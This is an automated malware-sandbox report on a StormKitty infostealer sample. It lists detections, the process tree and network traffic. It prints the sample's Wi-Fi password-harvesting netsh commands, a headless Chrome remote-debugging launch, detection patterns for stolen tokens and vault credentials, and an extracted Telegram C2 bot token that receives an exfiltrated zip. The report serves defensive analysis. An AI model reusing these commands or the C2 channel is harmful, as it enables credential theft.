Edit tour

Windows Analysis Report
StormKittyXZeroTrace.exe.bin.exe

Overview

General Information

Sample name:	StormKittyXZeroTrace.exe.bin.exe
Analysis ID:	1638548
MD5:	ae95df8dbc1fa111e8bdb7d071cf0db0
SHA1:	6775168a2ec9f696925ec251348d67f01e833dd7
SHA256:	897240fba0486e843c278d6033de055a2f185e15f700593b5a255146e8ab7fe7
Tags:	exeuser-TornadoAV_dev
Infos:

Detection

StormKitty

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Attempt to bypass Chrome Application-Bound Encryption

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: Capture Wi-Fi password

Suricata IDS alerts for network traffic

Yara detected Generic Stealer

Yara detected StormKitty Stealer

Yara detected Telegram RAT

Yara detected Telegram Recon

.NET source code references suspicious native API functions

Contains functionality to capture screen (.Net source)

Found many strings related to Crypto-Wallets (likely being stolen)

Joe Sandbox ML detected suspicious sample

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses netsh to modify the Windows network and firewall settings

Uses the Telegram API (likely for C&C communication)

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Browser Started with Remote Debugging

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

StormKittyXZeroTrace.exe.bin.exe (PID: 7108 cmdline: "C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe" MD5: AE95DF8DBC1FA111E8BDB7D071CF0DB0)

cmd.exe (PID: 6476 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 6620 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)

netsh.exe (PID: 6664 cmdline: netsh wlan show profile MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

findstr.exe (PID: 6708 cmdline: findstr All MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 6800 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 6828 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)

netsh.exe (PID: 6912 cmdline: netsh wlan show networks mode=bssid MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

chrome.exe (PID: 3356 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default" MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 6520 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1984,i,4059793281164060634,11983181844265787812,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2168 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Cameleon, StormKitty	PWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.	No Attribution	https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/threat-actor-of-in-tur-est.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot8012951680:AAFEQmvyUuE56tBcSf7T4NBD4jzoxpVWuJs/sendMessage", "Telegram Stream": [{"ok": true, "result": {"message_id": 28, "from": {"id": 8012951680, "is_bot": true, "first_name": "stealer", "username": "cryptostealerrrr_bot"}, "chat": {"id": -4711924264, "title": "ffff", "type": "group", "all_members_are_administrators": true}, "date": 1741958550, "document": {"file_name": "8.46.123.189.zip", "mime_type": "application/zip", "file_id": "BQACAgQAAxkDAAMcZ9QtloMtHZ3--jXxXAVoy-HbvQIAAtUTAALS6qFS-LkEHYqHoq42BA", "file_unique_id": "AgAD1RMAAtLqoVI", "file_size": 686505}}}]}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
StormKittyXZeroTrace.exe.bin.exe	JoeSecurity_TelegramRecon	Yara detected Telegram Recon	Joe Security
StormKittyXZeroTrace.exe.bin.exe	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
StormKittyXZeroTrace.exe.bin.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
StormKittyXZeroTrace.exe.bin.exe	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
StormKittyXZeroTrace.exe.bin.exe	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x153b3:$sk01: LimerBoy/StormKitty 0x2700f:$sk05: StormKitty.Implant 0x237c7:$str01: set_sUsername 0x23a31:$str02: set_sIsSecure 0x24663:$str03: set_sExpMonth 0x25e32:$str04: WritePasswords 0x2608d:$str05: WriteCookies 0x265ae:$str06: sChromiumPswPaths 0x2657e:$str07: sGeckoBrowserPaths 0x2857c:$str08: Username: {1} 0x28e4f:$str08: Username: {1} 0x28598:$str09: Password: {2} 0x28e6b:$str09: Password: {2} 0x296be:$str10: encrypted_key":"(.*?)"
StormKittyXZeroTrace.exe.bin.exe	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x2f492:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
StormKittyXZeroTrace.exe.bin.exe	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x29566:$s1: \VPN\NordVPN 0x2954c:$s2: \VPN\OpenVPN 0x2952e:$s3: \VPN\ProtonVPN
StormKittyXZeroTrace.exe.bin.exe	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x29d72:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x29de4:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x29e6e:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x29f00:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x29f6a:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x29fdc:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x2a072:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x2a102:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
StormKittyXZeroTrace.exe.bin.exe	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x153bc:$x3: StormKitty 0x2700f:$x3: StormKitty 0x27d68:$x3: StormKitty 0x1ff1c:$s2: GetAntivirus 0x26c44:$s2: GetAntivirus 0x28d2a:$s4: ^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$ 0x29274:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x296bc:$s6: "encrypted_key":"(.*?)"
Click to see the 4 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1094533087.000000000991C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GenericStealer_9	Yara detected Generic Stealer	Joe Security
00000000.00000002.1085360249.000000000337B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
00000000.00000002.1085360249.000000000337B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1085360249.000000000337B000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x17f48:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
00000000.00000000.900495812.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
00000000.00000000.900495812.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000000.900495812.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000000.900495812.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x2f292:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
00000000.00000002.1085360249.0000000003301000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1085360249.00000000033D4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: StormKittyXZeroTrace.exe.bin.exe PID: 7108	JoeSecurity_GenericStealer_9	Yara detected Generic Stealer	Joe Security
Process Memory Space: StormKittyXZeroTrace.exe.bin.exe PID: 7108	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
Process Memory Space: StormKittyXZeroTrace.exe.bin.exe PID: 7108	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: StormKittyXZeroTrace.exe.bin.exe PID: 7108	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: StormKittyXZeroTrace.exe.bin.exe PID: 7108	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x4a108:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84} 0x7957c:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
Click to see the 10 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.StormKittyXZeroTrace.exe.bin.exe.fe0000.0.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
0.0.StormKittyXZeroTrace.exe.bin.exe.fe0000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.0.StormKittyXZeroTrace.exe.bin.exe.fe0000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.0.StormKittyXZeroTrace.exe.bin.exe.fe0000.0.unpack	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x153b3:$sk01: LimerBoy/StormKitty 0x2700f:$sk05: StormKitty.Implant 0x237c7:$str01: set_sUsername 0x23a31:$str02: set_sIsSecure 0x24663:$str03: set_sExpMonth 0x25e32:$str04: WritePasswords 0x2608d:$str05: WriteCookies 0x265ae:$str06: sChromiumPswPaths 0x2657e:$str07: sGeckoBrowserPaths 0x2857c:$str08: Username: {1} 0x28e4f:$str08: Username: {1} 0x28598:$str09: Password: {2} 0x28e6b:$str09: Password: {2} 0x296be:$str10: encrypted_key":"(.*?)"
0.0.StormKittyXZeroTrace.exe.bin.exe.fe0000.0.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x2f492:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
0.0.StormKittyXZeroTrace.exe.bin.exe.fe0000.0.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x29566:$s1: \VPN\NordVPN 0x2954c:$s2: \VPN\OpenVPN 0x2952e:$s3: \VPN\ProtonVPN
0.0.StormKittyXZeroTrace.exe.bin.exe.fe0000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x29d72:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x29de4:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x29e6e:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x29f00:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x29f6a:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x29fdc:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x2a072:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x2a102:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.0.StormKittyXZeroTrace.exe.bin.exe.fe0000.0.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x153bc:$x3: StormKitty 0x2700f:$x3: StormKitty 0x27d68:$x3: StormKitty 0x1ff1c:$s2: GetAntivirus 0x26c44:$s2: GetAntivirus 0x28d2a:$s4: ^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$ 0x29274:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x296bc:$s6: "encrypted_key":"(.*?)"
Click to see the 3 entries

Sigma Signatures

System Summary

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe", ParentImage: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe, ParentProcessId: 7108, ParentProcessName: StormKittyXZeroTrace.exe.bin.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default", ProcessId: 3356, ProcessName: chrome.exe

Stealing of Sensitive Information

Sigma detected: Capture Wi-Fi password

Source: Process started

Author: Joe Security: Data: Command: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe", ParentImage: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe, ParentProcessId: 7108, ParentProcessName: StormKittyXZeroTrace.exe.bin.exe, ProcessCommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, ProcessId: 6476, ProcessName: cmd.exe

Suricata Signatures

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-14T14:22:29.445161+0100	2843856	1	A Network Trojan was detected	192.168.2.7	49699	149.154.167.220	443	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-14T14:22:29.438054+0100	1810008	1	Potentially Bad Traffic	192.168.2.7	49699	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: StormKittyXZeroTrace.exe.bin.exe

Avira: detected

Found malware configuration

Source: StormKittyXZeroTrace.exe.bin.exe.7108.0.memstrmin

Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot8012951680:AAFEQmvyUuE56tBcSf7T4NBD4jzoxpVWuJs/sendMessage", "Telegram Stream": [{"ok": true, "result": {"message_id": 28, "from": {"id": 8012951680, "is_bot": true, "first_name": "stealer", "username": "cryptostealerrrr_bot"}, "chat": {"id": -4711924264, "title": "ffff", "type": "group", "all_members_are_administrators": true}, "date": 1741958550, "document": {"file_name": "8.46.123.189.zip", "mime_type": "application/zip", "file_id": "BQACAgQAAxkDAAMcZ9QtloMtHZ3--jXxXAVoy-HbvQIAAtUTAALS6qFS-LkEHYqHoq42BA", "file_unique_id": "AgAD1RMAAtLqoVI", "file_size": 686505}}}]}

Multi AV Scanner detection for submitted file

Source: StormKittyXZeroTrace.exe.bin.exe	Virustotal: Detection: 61%			Perma Link
Source: StormKittyXZeroTrace.exe.bin.exe	ReversingLabs: Detection: 68%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Code function: 0_2_05356448 CryptUnprotectData,		0_2_05356448
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Code function: 0_2_0535643C CryptUnprotectData,		0_2_0535643C

Source: StormKittyXZeroTrace.exe.bin.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.7:49681 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.1.100:443 -> 192.168.2.7:49682 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49699 version: TLS 1.2

Source: StormKittyXZeroTrace.exe.bin.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: winload_prod.pdb source: Temp.txt.0.dr
Source:	Binary string: ntkrnlmp.pdb source: Temp.txt.0.dr
Source:	Binary string: winload_prod.pdb\ source: Temp.txt.0.dr
Source:	Binary string: ntkrnlmp.pdb\ source: Temp.txt.0.dr

Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user~1\	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Temp\8.46.123.189\	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user~1\AppData\Local\	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user~1\AppData\	Jump to behavior
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Temp\8.46.123.189\Directories\	Jump to behavior

Source: chrome.exe

Memory has grown: Private usage: 1MB later: 32MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49699 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2843856 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M2 : 192.168.2.7:49699 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot8012951680:AAFEQmvyUuE56tBcSf7T4NBD4jzoxpVWuJs/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="a986351d-dd72-4e48-a37c-7ed7456220e0"Host: api.telegram.orgContent-Length: 686842Expect: 100-continueConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 34.117.59.81 34.117.59.81
Source: Joe Sandbox View	IP Address: 34.117.59.81 34.117.59.81
Source: Joe Sandbox View	IP Address: 104.26.1.100 104.26.1.100

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIk6HLAQiKo8sBCIWgzQEI9s/OAQiB1s4BCMnczgEIhODOAQii5M4BCK/kzgEI6eTOAQ==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIk6HLAQiKo8sBCIWgzQEI9s/OAQiB1s4BCMnczgEIhODOAQii5M4BCK/kzgEI6eTOAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9

Source: chrome.exe, 0000000A.00000003.1025895513.000016F400778000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: ":falsH_comple},"spellcheck":{"dictionaries":["en-US"],"dictionary":""},"supervised_user":{"metrics":{"day_id":154408}},"sync":{"autofill_wallet_import_enabled_migrated":true,"data_type_status_for_sync_to_signin":{"app_list":false,"app_settings":false,"apps":false,"arc_package":false,"autofill":false,"autofill_profiles":false,"autofill_wallet":false,"autofill_wallet_credential":false,"autofill_wallet_metadata":false,"autofill_wallet_offer":false,"autofill_wallet_usage":false,"bookmarks":false,"collaboration_group":false,"contact_info":false,"cookies":false,"device_info":false,"dictionary":false,"extension_settings":false,"extensions":false,"history":false,"history_delete_directives":false,"incoming_password_sharing_invitation":false,"managed_user_settings":false,"nigori":false,"os_preferences":false,"os_priority_preferences":false,"outgoing_password_sharing_invitation":false,"passwords":false,"plus_address":false,"plus_address_setting":false,"power_bookmark":false,"preferences":false,"printers":false,"printers_authorization_servers":false,"priority_preferences":false,"product_comparison":false,"reading_list":false,"saved_tab_group":false,"search_engines":false,"security_events":false,"send_tab_to_self":false,"sessions":false,"shared_tab_group_data":false,"sharing_message":false,"themes":false,"user_consent":false,"user_events":false,"web_apps":false,"webapks":false,"webauthn_credential":false,"wifi_configurations":false,"workspace_desk":false},"encryption_bootstrap_token_per_account_migration_done":true,"feature_status_for_sync_to_signin":5,"passwords_per_account_pref_migration_done":true,"requested":false},"tab_group_saves_ui_update_migrated":true,"toolbar":{"pinned_chrome_labs_migration_complete":true},"translate_site_blacklist":[],"translate_site_blocklist_with_time":{},"updateclientdata":{"apps":{"nmmhkkegccagdldgiimedpiccmgmieda":{"cohort":"1::","cohortname":"","dlrc":6640,"installdate":6640,"pf":"50b70b56-f9a8-488a-9bd0-bef34289ee8e"}}},"web_app":{"app_id":{"install_url":{"aghbiahbpaijignceidepookljebhfak":["https://drive.google.com/drive/installwebapp?usp=chrome_default"],"agimnkijcaahngcdmfeangaknmldooml":["https://www.youtube.com/s/notifications/manifest/cr_install.html"],"fhihpiojkbmbpdjeoajapmgkhlnakfjf":["https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default"],"fmgjjmmmlfnkbppncabfkddbjimcfncm":["https://mail.google.com/mail/installwebapp?usp=chrome_default"],"kefjledonklijopmnomlcbpllchaibag":["https://docs.google.com/presentation/installwebapp?usp=chrome_default"],"mpnpojknpmmopombnjdcgaaiekajbnjb":["https://docs.google.com/document/installwebapp?usp=chrome_default"]}}},"web_apps":{"did_migrate_default_chrome_apps":["MigrateDefaultChromeAppToWebAppsGSuite","MigrateDefaultChromeAppToWebAppsNonGSuite"],"last_preinstall_synchronize_version":"134","migrated_default_apps":["aohghmighlieiainnegkcijnfilokake","aapocclcgogkmnckokdopfmhonfmgoek","felcaaldnbdncclmgdcncolpebgiejap","apdfllckaahabafndbhieahigkjlhalf","pjkljhegnc
Source: chrome.exe, 0000000A.00000002.1074285546.000016F400AC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000A.00000003.1031972512.000016F400328000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1026534072.000016F401534000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: <!--_html_template_end_-->`}const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends CrLitElement{constructor(){super(...arguments);this.url={url:""}}static get is(){return"ntp-doodle-share-dialog"}static get styles(){return getCss$2()}render(){return getHtml$2.bind(this)()}static get properties(){return{title:{type:String},url:{type:Object}}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.fire("share",channel)}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);let instance$3=null;function getCss$1(){return 